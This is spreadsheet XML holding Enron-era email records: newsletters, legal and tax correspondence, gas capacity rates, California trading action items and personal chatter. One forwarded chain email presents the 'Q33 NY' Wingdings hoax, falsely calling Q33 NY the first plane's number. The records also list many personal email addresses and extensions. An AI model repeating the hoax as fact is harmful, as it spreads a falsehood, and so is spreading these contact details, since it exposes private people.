    <t>frozenset({'janice.moore@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'linda.simmons@enron.com', 'linda.noske@enron.com', 'richard.sanders@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'shonnie.daniel@enron.com', 'jenny.helton@enron.com', 'mark.taylor@enron.com', 'ed.iii@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'legal.6@enron.com', 'janette.elbertson@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'legal.5@enron.com', 'suzanne.adams@enron.com', 'linda.guinn@enron.com', 'legal.1@enron.com', 'becky.tlucek@enron.com', 'sandi.braband@enron.com', 'taffy.milligan@enron.com', 'bob.carter@enron.com', 'susan.bailey@enron.com', 'sheila.tweed@enron.com', 'chaundra.woods@enron.com', 'erica.braden@enron.com', 'janet.moore@enron.com', 'barbara.gray@enron.com', 'mark.haedicke@enron.com', 'chris.gaffney@enron.com', 'pat.radford@enron.com', 'dan.hyvl@enron.com', 'wayne.gresham@enron.com', 'monica.richards@enron.com', 'paula.craft@enron.com', 'legal.2@enron.com', 'shawna.flynn@enron.com', 'richard.jeffrey@enron.com', 'kay.mann@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'matt.maxwell@enron.com', 'gloria.cruz@enron.com', 'leslie.hansen@enron.com', 'stuart.zisman@enron.com', 'lance.legal@enron.com', 'jeffrey.hodge@enron.com', 'peggy.banczak@enron.com', 'anne.koehler@enron.com', 'eric.gillaspie@enron.com', 'stephen.hooser@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'susan.flynn@enron.com', 'debra.perlingiere@enron.com', 'reginald.shanks@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'legal.4@enron.com', 'peter.vecchio@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'joya.davis@enron.com', 'travis.mccullough@enron.com', 'brenda.whitehead@enron.com', 'martin.penkwitz@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'ann.white@enron.com', 'roger.balog@enron.com', 'teresa.bushman@enron.com', 'elizabeth.sager@enron.com', 'legal.3@enron.com', 'john.viverito@enron.com', 'dan.lyons@enron.com', 'shari.stack@enron.com', 'mary.heinitz@enron.com', 'marie.heard@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com', 'dina.snow@enron.com'})</t>
  </si>
  <si>
    <t>Jason Peters</t>
  </si>
  <si>
    <t>Jason Peters, a contract attorney from Andrews &amp; Kurth, can be contacted   at _x000D_
X39720, EB3846.</t>
  </si>
  <si>
    <t>Fri, 21 Sep 2001 06:09:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'megrogers_99@yahoo.com'})</t>
  </si>
  <si>
    <t>weird thing!!</t>
  </si>
  <si>
    <t>Ben,_x000D_
Check this out:_x000D_
_x000D_
1.  Go to MS word and type Q33 NY (the number of the_x000D_
first plane that crashed into the WTC)_x000D_
2.  Increase the font to 65_x000D_
3.  Change the font to Wingdings_x000D_
Look at what you have!!!_x000D_
_x000D_
Megan_x000D_
_x000D_
___________________________________________________x000D_
Terrorist Attacks on U.S. - How can you help?_x000D_
Donate cash, emergency relief information_x000D_
http://dailynews.yahoo.com/fc/US/Emergency_Information/</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 13:45:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'svarga@kudlow.com'})</t>
  </si>
  <si>
    <t>New Kudlow's Take</t>
  </si>
  <si>
    <t>_x000D_
A new Kudlow's Take has been published on Kudlow.com. As a subscriber, you may click the hyperlink below, login, and view the latest Kudlow's Take. AOL Users please note, you may need to copy and paste the hyperlink into your web browser._x000D_
_x000D_
Thank You,_x000D_
_x000D_
Kudlow &amp; Company, LLC._x000D_
_x000D_
http://www.kudlow.com/members/login.asp?To=Content&amp;ContentID=307</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 11:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Breakfast News: PepsiCo's Refreshing Q1</t>
  </si>
  <si>
    <t>Please respond to The Motley Fool _x000D_
======================== THE MOTLEY FOOL ========================_x000D_
                   B R E A K F A S T   N E W S_x000D_
                     Monday, April 23, 2001_x000D_
benjamin.rogers@enron.com_x000D_
=================================================================_x000D_
_x000D_
IN THIS ISSUE_x000D_
---------------------_x000D_
- TOP STORY: PEPSICO'S REFRESHING Q1_x000D_
  http://www.fool.com/m.asp?i=396288_x000D_
_x000D_
- NEWS TO GO: T. ROWE PRICE, ENTRUST, AND EXXON MOBIL_x000D_
  http://www.fool.com/m.asp?i=396289_x000D_
_x000D_
- HOT TOPICS: IMAC, NOKIA VS. ERICSSON, AND AMD_x000D_
  http://www.fool.com/m.asp?i=396290_x000D_
_x000D_
=================================================================_x000D_
SPONSORED BY: BusinessWeek Online_x000D_
Understand and predict the market. The BusinessWeek 50 is_x000D_
the definitive source for the decision-making info and tools_x000D_
you need to stay on top of the market - and the_x000D_
competition._x000D_
http://www.lnksrv.com/m.asp?i=396291_x000D_
_x000D_
_x000D_
"An overburdened, over-stretched executive is the best_x000D_
executive, because he or she doesn't have the time to meddle, to_x000D_
deal in trivia, to bother people." --Jack Welch_x000D_
_x000D_
-----------------------------------------------------------------_x000D_
TOP STORY_x000D_
-----------------------------------------------------------------_x000D_
_x000D_
PEPSICO'S REFRESHING Q1_x000D_
Soda and salty-snack giant PepsiCo (NYSE: PEP) reported_x000D_
first-quarter financial results this morning, turning in_x000D_
earnings that beat Wall Street's forecast by a penny at $0.34_x000D_
per share, up from last year's $0.29. Companywide revenues_x000D_
improved 8.5% to $4.5 billion including international currency_x000D_
effects, which hurt results._x000D_
_x000D_
&gt;&gt;FULL STORY:_x000D_
http://www.fool.com/m.asp?i=396292_x000D_
_x000D_
-----------------------------------------------------------------_x000D_
NEWS TO GO_x000D_
-----------------------------------------------------------------_x000D_
_x000D_
Mutual fund company T. Rowe Price (Nasdaq: TROW) said_x000D_
first-quarter net income was $0.38 per share, down significantly_x000D_
from last year's $0.58 and missing Wall Street's consensus_x000D_
forecast by two pennies. Revenues fell to $280.5 million from_x000D_
$316.3 million a year ago as declining assets under management_x000D_
cut into the fees the company could collect. For more on mutual_x000D_
funds, check out our recent special by Chris Rugaber._x000D_
http://www.fool.com/m.asp?i=396293_x000D_
_x000D_
Internet security solutions company Entrust (Nasdaq: ENTU) named_x000D_
former Nortel (NYSE: NT) executive William Conner its president_x000D_
and CEO. A member of Entrust's board since 1997, Conner was_x000D_
chairman from October 1998 to May 2000._x000D_
_x000D_
Oil company Exxon Mobil (NYSE: XOM) said first-quarter net_x000D_
income, before items, was more than $5 billion at $1.44 per_x000D_
share, up from last year's $0.95. Wall Street's consensus_x000D_
estimate was $1.35 per share, but the company beat that handily_x000D_
because of high oil and gas prices. Revenue was $57.3 billion._x000D_
_x000D_
Irish drug company Elan (NYSE: ELN), profiled in a December_x000D_
feature by Zeke Ashton, said Q1 net income was $0.41 per share,_x000D_
up from last year's $0.24 and a penny better than estimates as_x000D_
sales improved 27% to $429 million._x000D_
http://www.fool.com/m.asp?i=396294_x000D_
_x000D_
-----------------------------------------------------------------_x000D_
HOT TOPICS_x000D_
-----------------------------------------------------------------_x000D_
IMACS HELP SURVIVORS_x000D_
Apple Fools were quick to notice that the iMac was Survivor's_x000D_
computer of choice. Did the Wintel get voted off the island?_x000D_
http://www.fool.com/m.asp?i=396295_x000D_
_x000D_
NOKIA VS. ERICSSON_x000D_
With first-quarter reports out on both companies, Fools are_x000D_
making some comparisons._x000D_
http://www.fool.com/m.asp?i=396296_x000D_
_x000D_
ANALYZING AMD_x000D_
Fools on the AMD board are taking a close look at the company as_x000D_
well as doing some number crunching. What's ahead for this chip_x000D_
giant?_x000D_
http://www.fool.com/m.asp?i=396297_x000D_
_x000D_
&gt;&gt;MORE HOT TOPICS_x000D_
http://www.fool.com/m.asp?i=396298_x000D_
_x000D_
=================================================================_x000D_
SPONSORED BY: BusinessWeek Online_x000D_
Understand and predict the market. The BusinessWeek 50 is_x000D_
the definitive source for the decision-making info and tools_x000D_
you need to stay on top of the market - and the_x000D_
competition._x000D_
http://www.lnksrv.com/m.asp?i=396299_x000D_
=================================================================_x000D_
_x000D_
My Portfolio: http://www.fool.com/m.asp?i=396300_x000D_
My Discussion Boards: http://www.fool.com/m.asp?i=396301_x000D_
My Fool: http://www.fool.com/m.asp?i=396302_x000D_
Fool.com Home: http://www.fool.com/m.asp?i=396303_x000D_
My Email Settings:_x000D_
http://www.fool.com/community/freemail/freemaillogin.asp?email=benjamin.rogers@enron.com_x000D_
_x000D_
_x000D_
_x000D_
25 INVESTING IDEAS FOR A DOWN MARKET_x000D_
Our Rule Maker team has picked out 25 high-quality companies_x000D_
with realistic valuations. Check them out and see if one of_x000D_
these investments is right for you._x000D_
http://www.lnksrv.com/m.asp?i=396304_x000D_
_x000D_
GET WHAT YOU'VE BEEN MISSING!_x000D_
Check out our Member Benefits Center for_x000D_
our latest special offers, just for you._x000D_
http://www.fool.com/m.asp?i=396305_x000D_
_x000D_
FREE BOOK FROM INVESTOR'S BUSINESS DAILY_x000D_
Get a free investing guide when you sign up for a free trial_x000D_
subscription._x000D_
http://www.lnksrv.com/m.asp?i=396306_x000D_
_x000D_
FOOL DIRECT EMAIL SERVICES_x000D_
Unsubscribe, change your settings, temporarily suspend mail_x000D_
delivery:_x000D_
http://www.fool.com/community/freemail/freemaillogin.asp?email=benjamin.rogers@enron.com_x000D_
_x000D_
EMAIL DISCUSSION BOARD_x000D_
Let us know what you think of our email products:_x000D_
http://www.fool.com/m.asp?i=396307_x000D_
_x000D_
__________________________________________________________________x000D_
(c) Copyright 2001,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MsgId: msg-7411-2001-04-23_9-26-13-3397367_2_Plain_MessageAddress.msg-09:32:06(4-23-2001)_x000D_
X-Version: mailer-sender-master,v 1.84_x000D_
X-Version: mailer-sender-daemon,v 1.84_x000D_
Message-Recipient: benjamin.rogers@enron.com</t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 06:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'guenther.klar@enron.com'})</t>
  </si>
  <si>
    <t>Sara_x000D_
_x000D_
You are right about the tax issue - in fact, we are in the process of _x000D_
replacing the UK directors and officers of Enron Credit Inc with US directors _x000D_
and officers._x000D_
_x000D_
The entity that signs up to the confidentiality agreement ought to be the one _x000D_
that owns the information to be supplied.  Based on conversations I have had _x000D_
with Richard Sage, I had formed the impression that the owner of the _x000D_
information was Enron Credit Ltd.  If this is right, we should pursue your _x000D_
first suggestion.  Otherwise, given that the tax issue is being rectified and _x000D_
this should therefore be an isolated incident, I think we can wear the tax _x000D_
risk inherent in your second suggestion.  Though I do wonder whether an _x000D_
officer of Enron Credit Inc, such as Richard Sage (currently), could sign, _x000D_
rather than a director?_x000D_
_x000D_
Kind regards_x000D_
_x000D_
Guenther Klar</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 08:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: UT Game</t>
  </si>
  <si>
    <t xml:space="preserve">what do you want for watters straight up - in reality - _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Bass, Jason" &lt;Jason.Bass2@COMPAQ.com&gt; on 09/12/2000 03:46:01 PM_x000D_
To: "'Eric.Bass@enron.com'" &lt;Eric.Bass@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: UT Game_x000D_
_x000D_
_x000D_
I am going to pass on the current offer.  I want to hold on to Taylor.  I_x000D_
don't think Garner will be worth a shit.  Now if you would want to do_x000D_
Watters for Robinson straight up, I would do that._x000D_
_x000D_
Jason Bass_x000D_
TSE_x000D_
Compaq Computer Corporation_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Eric.Bass@enron.com [mailto:Eric.Bass@enron.com]_x000D_
Sent: Tuesday, September 12, 2000 9:39 AM_x000D_
To: daphneco64@bigplanet.com; lwbthemarine@bigplanet.com_x000D_
Cc: Bass, Jason_x000D_
Subject: UT Game_x000D_
_x000D_
My tickets are in the student section for the game - I have four.  I don't_x000D_
know if you want to sit in the student section b/c you really won't be_x000D_
sitting much - most of the students stand up the entire game.  So, if you_x000D_
want to sit, we need to work on getting some seats in the alumni section._x000D_
_x000D_
Jason - if you and Donnita want to come, you can have my two extra seats in_x000D_
the student section, assuming what I said above is correct._x000D_
_x000D_
Let me know_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 08:42:31 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'luiz.maurer@enron.com'})</t>
  </si>
  <si>
    <t>RE: NG Meeting in Columbus, OH Dec4/Dec5</t>
  </si>
  <si>
    <t>No need to prepare anything.  They'll do most of the talking._x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maurer, Luiz  _x000D_
Sent:	Friday, November 09, 2001 9:47 AM_x000D_
To:	Steffes, James D._x000D_
Subject:	RE: NG Meeting in Columbus, OH Dec4/Dec5_x000D_
_x000D_
Jim_x000D_
_x000D_
What should we prepare or analyze in advance?_x000D_
_x000D_
LM_x000D_
_x000D_
P.S. Just for your information, I will summarize the Independent System Operator Proposal made by Southern - it evolved during the Mediation process but it retains the concept of National Grid being the Transco/RTO_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Friday, November 09, 2001 9:21 AM_x000D_
To:	Roan, Michael_x000D_
Cc:	Stroup, Kerry; Maurer, Luiz_x000D_
Subject:	NG Meeting in Columbus, OH Dec4/Dec5_x000D_
_x000D_
Mike --_x000D_
_x000D_
Ashley Brown called to discuss a meeting with the Stakeholders in Columbus, OH on either Dec 4 or Dec 5.  He would like our participation.  Also, he would like us to let our friends in the industry know about this upcoming meeting._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jim</t>
  </si>
  <si>
    <t>Thu, 22 Nov 2001 15:09:21 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: Re: John Millar</t>
  </si>
  <si>
    <t>_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: McCarty, Danny &lt;Danny.McCarty@ENRON.com&gt;_x000D_
To: Nelson, Mike &lt;Michel.Nelson@ENRON.com&gt;_x000D_
Sent: Wed Nov 21 13:25:34 2001_x000D_
Subject: Re: John Millar_x000D_
_x000D_
Mike,_x000D_
    If you need JohnSpeak up now. If not, he's gone on TUESDAY. Let Gary Smith know today if you want him. Thanks. _x000D_
_x000D_
Dan_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Sun, 8 Oct 2000 07:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mbarksda@ems.jsc.nasa.gov'})</t>
  </si>
  <si>
    <t>RE: (no subject)</t>
  </si>
  <si>
    <t>Please call me at 713 557 3330</t>
  </si>
  <si>
    <t>Tue, 26 Mar 2002 14:59:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'patrick.ryder@enron.com', 'chance.rabon@enron.com', 'david.draper@enron.com'})</t>
  </si>
  <si>
    <t>EES/WHOLESALE Reports</t>
  </si>
  <si>
    <t>Would you guys please call me in the morning. We need to get some reports before lunch tomorrow._x000D_
_x000D_
Thanks_x000D_
Joe _x000D_
39636</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 09:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'susan.smith@enron.com', 'marilyn.colbert@enron.com', 'michael.morris@enron.com', 'sylvia.campos@enron.com', 'faye.ellis@enron.com', 'justin.timothy@enron.com', 'robert.cass@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'brad.coleman@enron.com', 'sylvia.pollan@enron.com', 'connie.sutton@enron.com', "karen.o'day@enron.com", 'lisa.carver@enron.com', 'elizabeth.hernandez@enron.com', 'larry.hunter@enron.com', 'edward.terry@enron.com', 'dianne.seib@enron.com', 'melissa.graves@enron.com', 'christa.winfrey@enron.com', 'kenneth.harmon@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jeff.richter@enron.com', 'anita.patton@enron.com', 'cyril.price@enron.com', 'melba.lozano@enron.com', 'colleen.sullivan@enron.com', 'elsa.villarreal@enron.com', 'eol.center@enron.com', 'anthony.campos@enron.com', 'vance.taylor@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'debbie.brackett@enron.com', 'amelia.alland@enron.com', 'camille.gerard@enron.com', 'errol.mclaughlin@enron.com', 'richard.miley@enron.com', 'samuel.schott@enron.com', 'mark.thorne@enron.com', 'mary.smith@enron.com', 'laura.vargas@enron.com', 'oscar.rivera@enron.com', 'lisa.cousino@enron.com', 'kimberlee.bennick@enron.com', 'peter.berzins@enron.com', 'donald.reinhardt@enron.com', 'brenda.herod@enron.com', 'scotty.gilbert@enron.com', 'clem.cernosek@enron.com', 'bernice.rodriguez@enron.com', 'jennifer.oliver@enron.com', 'john.powell@enron.com', 'claudia.clark@enron.com', 'susan.elledge@enron.com', 'kate.symes@enron.com', 'james.scribner@enron.com', 'kathryn.bussell@enron.com', 'peggy.hedstrom@enron.com', 'andrew.lewis@enron.com', 'richard.mckeel@enron.com', 'tara.sweitzer@enron.com', 'chris.mallory@enron.com', 'tony.harris@enron.com', 'edward.baughman@enron.com', 'daren.farmer@enron.com', 'geoff.storey@enron.com', 'lauri.allen@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'nanette.kettler@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'rahil.jafry@enron.com', 'lisa.valderrama@enron.com', "romeo.d'souza@enron.com", 'sanjeev.gupta@enron.com', 'scott.lytle@enron.com', 'cheryl.dawes@enron.com', 'carrie.southard@enron.com', 'marilyn.schoppe@enron.com', 'gary.lamphier@enron.com', 'enron.facilities@enron.com', 'joshua.meachum@enron.com', 'keith.clark@enron.com', 'walter.guidroz@enron.com', 'willie.stewart@enron.com', 'scott.mills@enron.com', 'fiona.skinner@enron.com', 'john.nowlan@enron.com', 'shawna.flynn@enron.com', 'veronica.espinoza@enron.com', 'marlene.hilliard@enron.com', 'karen.lambert@enron.com', 'george.weissman@enron.com', 'kori.loibl@enron.com', 'lisa.gillette@enron.com', 'sony.wilson@enron.com', 'richard.pinion@enron.com', 'enron.counterparty@enron.com', 'mike.croucher@enron.com', 'tom.moore@enron.com', 'jackie.morgan@enron.com', 'cheryl.dudley@enron.com', 'carlos.rodriguez@enron.com', 'rhonda.denton@enron.com', 'stacey.white@enron.com', 'linda.bryan@enron.com', 'claire.viejou@enron.com', 'hoong.foon@enron.com', 'rousseau.anai@enron.com', 'andrea.guillen@enron.com', 'sherry.dawson@enron.com', 'jim.little@enron.com', 'glenda.mitchell@enron.com', 'stacy.dickson@enron.com', 'elsie.lew@enron.com', 'julie.meyers@enron.com', 'matt.motsinger@enron.com', 'carolyn.gilley@enron.com', 'robert.cotten@enron.com', 'randall.gay@enron.com', 'jenny.latham@enron.com', 'cary.carrabine@enron.com', 'phillip.platter@enron.com', 'nathan.hlavaty@enron.com', 'torrey.moorer@enron.com', 'debra.perlingiere@enron.com', 'katherine.kelly@enron.com', 'monica.lande@enron.com', 'amita.gosalia@enron.com', 'philippe.travis@enron.com', 'karin.williams@enron.com', 'michael.eiben@enron.com', 'sheri.thomas@enron.com', 'liz.hillman@enron.com', 'hillary.mack@enron.com', 'tracy.ngo@enron.com', 'd.hall@enron.com', 'jeremy.morris@enron.com', 'anne.bike@enron.com', 'veronica.thompson@enron.com', 'frank.davis@enron.com', 'nidia.mendoza@enron.com', 'brad.schneider@enron.com', 'b.palmer@enron.com', 'david.hardy@enron.com', 'lisa.lees@enron.com', 'susan.trevino@enron.com', 'matilda.machado@enron.com', 'simone.rose@enron.com', 'jeremy.wong@enron.com', 'sam.round@enron.com', 'stephanie.sever@enron.com', 'diane.ellstrom@enron.com', 'regina.perkins@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'dale.neuner@enron.com', 'brant.reves@enron.com', 'suzy.robey@enron.com', 'john.swinney@enron.com', 'sharon.gonzales@enron.com', 'james.shirley@enron.com', 'rita.wynne@enron.com', 'michele.small@enron.com', 'donna.consemiu@enron.com', 'arfan.aziz@enron.com', 'bruce.mills@enron.com', 'pat.clynes@enron.com', 'cindy.horn@enron.com', 'jennifer.denny@enron.com', 'lesli.campbell@enron.com', 'georgia.blanchard@enron.com', 'carla.hoffman@enron.com', 'cyndie.balfour-flanagan@enron.com', 'troy.klussmann@enron.com', 'lynn.shivers@enron.com', 'tana.jones@enron.com', 'debbie.nicholls@enron.com', 'stacey.richardson@enron.com', 'frank.ortiz@enron.com', 'winston.goodbody@enron.com', "o'neal.winfree@enron.com", 'jennifer.blay@enron.com', 'leslie.reeves@enron.com', 'bob.bowen@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Name Overlays 0312</t>
  </si>
  <si>
    <t>We have duplicate records in the system. _x000D_
_x000D_
Deutsche Bank Aktiengesellschaft, CP ID 55900, and_x000D_
_x000D_
Deutsche Bank AG, CP ID 92230_x000D_
_x000D_
Credit has verified that the correct legal name should be Deutsche Bank, AG.  _x000D_
A record in that name was just created in GCP in Feb '01.  In order to _x000D_
preserve the history on the old record, and since one name is just an _x000D_
abbreviated form of the other, I will make the correction on the older _x000D_
record, 55900 to change it to "AG" and suspend the newer record, 92230, _x000D_
pending inactivation on 04/01/01.  This is not an overlay, so I wanted to _x000D_
provide some explanation in advance. _x000D_
_x000D_
Please note the overlays.  These changes were made in GCP today, with the _x000D_
noted exception.  The summary of those changes are on the "Mar 01 Changes" _x000D_
tab (refer to bottom left corner), to see the detail for those entries, see _x000D_
the "Mar 2001" bottom tab._x000D_
_x000D_
Shortname changes will be coordinated w/ ERMS IT on Friday, March 16._x000D_
_x000D_
Records will be inactivated on April 2, 2001._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cheryl x33103</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 04:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Brief Jose LNG status</t>
  </si>
  <si>
    <t>Mike and Jeff,_x000D_
_x000D_
For your review and general information, attached please find a brief summary _x000D_
of the recent events in Venezuela. It is the weekly report that I sent _x000D_
earlier this week to Eric._x000D_
_x000D_
Emilio</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 10:22:41 -0800 (PST)</t>
  </si>
  <si>
    <t>SCS OPENING CRUDE STRADDLES 11-21</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
 - 11_21_01LO.xls </t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 03:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.porter@enron.com'})</t>
  </si>
  <si>
    <t>Re: Nov Capacity</t>
  </si>
  <si>
    <t xml:space="preserve">Also, 68918 DP should be COH Parma 5-2, please confirm._x000D_
_x000D_
Also there should be 1,000/d Leach to COH 8-35 released from COH to CES to _x000D_
ENA?_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
10/25/2000 08:42 AM_x000D_
Jeffrey Porter_x000D_
Jeffrey Porter_x000D_
Jeffrey Porter_x000D_
10/25/2000 08:42 AM_x000D_
10/25/2000 08:42 AM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: dscott1@columbiaenergygroup.com@ECT, Michael H Garred/HOU/EES@EES, _x000D_
Victoria Versen/HOU/ECT@ECT, Dave Scott/HOU/EES _x000D_
Subject: Re: Nov Capacity  _x000D_
_x000D_
That looks like them. Here's the rates(demand Charges)_x000D_
_x000D_
68915-$5.171_x000D_
68916-$5.18_x000D_
68917-$5.1807_x000D_
68918-$5.171_x000D_
69148-$5.171_x000D_
69149-$5.18_x000D_
_x000D_
You also had 1,600/d on your 10/19 capacity email (Toledo to Sandusky) _x000D_
Contract#?; should be at $5.171._x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 04:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'harry.kingerski@enron.com', 'steven.kean@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>California Action Items</t>
  </si>
  <si>
    <t>FYI.  Here is an update from the EES meeting this morning with action items._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
----- Forwarded by James D Steffes/NA/Enron on 03/01/2001 10:46 AM -----_x000D_
_x000D_
	David W Delainey@EES_x000D_
	03/01/2001 10:37 AM_x000D_
		 _x000D_
		 To: Marty Sunde/HOU/EES@EES, Don Black/HOU/EES@EES, Dan Leff/HOU/EES@EES, _x000D_
Janet R Dietrich/HOU/EES@EES, James D Steffes/NA/Enron@Enron, Jeremy _x000D_
Blachman/HOU/EES@EES, Vicki Sharp/HOU/EES@EES, Scott Gahn/HOU/EES@EES_x000D_
		 cc: _x000D_
		 Subject: California Action Items_x000D_
_x000D_
Guys, a quick follow up on action items:_x000D_
 CALIFORNIA:_x000D_
 a) UC/CSU - send notice of default to them to start the clock ticking on the _x000D_
mediation and arbitration this will also give us time to complete the _x000D_
remaining transfer of the existing accounts on SCE - MS/VS - ASAP;_x000D_
 b) '02 California positions - need update from regulatory giving us a view _x000D_
of the following:_x000D_
    - possible market structure (ie) probability of direct access or forced _x000D_
direct access for our customers where we would be required to deliver market _x000D_
priced power to fulfull our requirements in a post AB 1890 world?; - JS - ASAP_x000D_
    - if it is likely that these customers will be left on tariff because of _x000D_
a lack of direct access or that we can elect to leave them on a tariff what _x000D_
are the likely tariff structures ( and their components) to replace AB _x000D_
1890?;  - JS - ASAP_x000D_
    - given above what are the likely tariff increases expected; - JS - ASAP_x000D_
     - and what are we currently doing to perfect our lien (regulatory) and _x000D_
ultimately legally on the collection of the negative CTC from the utilities - _x000D_
JS/VS - next week._x000D_
 Ultimately, we want to make a call on what we do with these MWhrs early next _x000D_
week._x000D_
 c) position reports - need a full WSCC energy, scalar, capacity, _x000D_
physical/financial, "index", load shape exposures etc position reports on a _x000D_
go forward basis - JD/DB - ASAP_x000D_
 d) "pass through" risk - due diligence on the basis and other risks _x000D_
associated with these index or pass through deals; - JD/DB - next week_x000D_
 e) risk matrix - document percieved risk/return matrix (market, regulatory, _x000D_
credit, etc) for continuing to deliver fixed price physical or financial _x000D_
power commodity products through bundled &amp; commodity deals or blend and _x000D_
extend for existing D-DASRed PGE and SCE customers. This will provide us the _x000D_
pricing, structure and profitability parameters necessary to continue to take _x000D_
certain defined risk - SG/DB - next week._x000D_
 f) deal pipeline - full listing of volumes, possible pricing structure and _x000D_
timing for future bundled, commodity and "blend and extends for D-DASRed _x000D_
customers" in the deal pipeline for California - JB/SG/MS for Melvin and _x000D_
others - ASAP_x000D_
_x000D_
 NEW YORK:_x000D_
 a) position reports - need a full NYC energy, scalar, capacity, _x000D_
physical/financial, "index", load shape exposures etc position reports on a _x000D_
go forward basis - JD/DB - ASAP;_x000D_
 b) regulatory and political framework - comprehensive review of issues, _x000D_
challenges et al in the emerging crisis debate in NYC - JS - next week;_x000D_
 c) risk matrix - document percieved risk/return matrix (market, regulatory, _x000D_
credit, etc) for continuing to deliver fixed price physical or financial _x000D_
power commodity products through bundled &amp; commodity deals for NY customers. _x000D_
This will provide us the pricing, structure and profitability parameters _x000D_
necessary to continue to take certain defined risk - SG/DB - next week;_x000D_
 d) deal pipeline - full listing of volumes, possible pricing structure and _x000D_
timing for future bundled and  commodity deals in the deal pipeline for NY - _x000D_
JB/SG/MS for Melvin and others - ASAP_x000D_
_x000D_
 FLORIDA:_x000D_
 a)position reports - need a full Florida energy, scalar, capacity, _x000D_
physical/financial, "index", load shape exposures etc position reports on a _x000D_
go forward basis - JD/DB - ASAP;_x000D_
 b) deal pipeline - full listing of volumes, possible pricing structure and _x000D_
timing for future bundled and  commodity deals in the deal pipeline for _x000D_
Florida - JB/SG/MS for Melvin and others - ASAP._x000D_
_x000D_
Regards_x000D_
Delainey</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 08:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CP, please add to my calendar.  I'll take home a copy for chris._x000D_
m_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 11/14/2000 _x000D_
04:57 PM ---------------------------_x000D_
  Cindy Olson  Executive VP_x000D_
   Human Resources &amp; Community Relations  _x000D_
From: Cindy Olson  Executive VP Human Resources &amp; Community Relations@ENRON _x000D_
on 11/13/2000 06:46 PM_x000D_
Sent by: Enron Announcements@ENRON_x000D_
To: Enron Employees United States_x000D_
cc:  _x000D_
Subject: Holiday Schedule 2001_x000D_
_x000D_
Please click on the URL below for Enron's 2001 Holiday Schedule._x000D_
_x000D_
http://home.enron.com:84/messaging/2001sched.jpg</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 12:36:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Staffing</t>
  </si>
  <si>
    <t xml:space="preserve">you're fired._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kaufman, Paul  _x000D_
Sent:	Thursday, October 25, 2001 2:36 PM_x000D_
To:	Dasovich, Jeff_x000D_
Subject:	RE: Staffing_x000D_
_x000D_
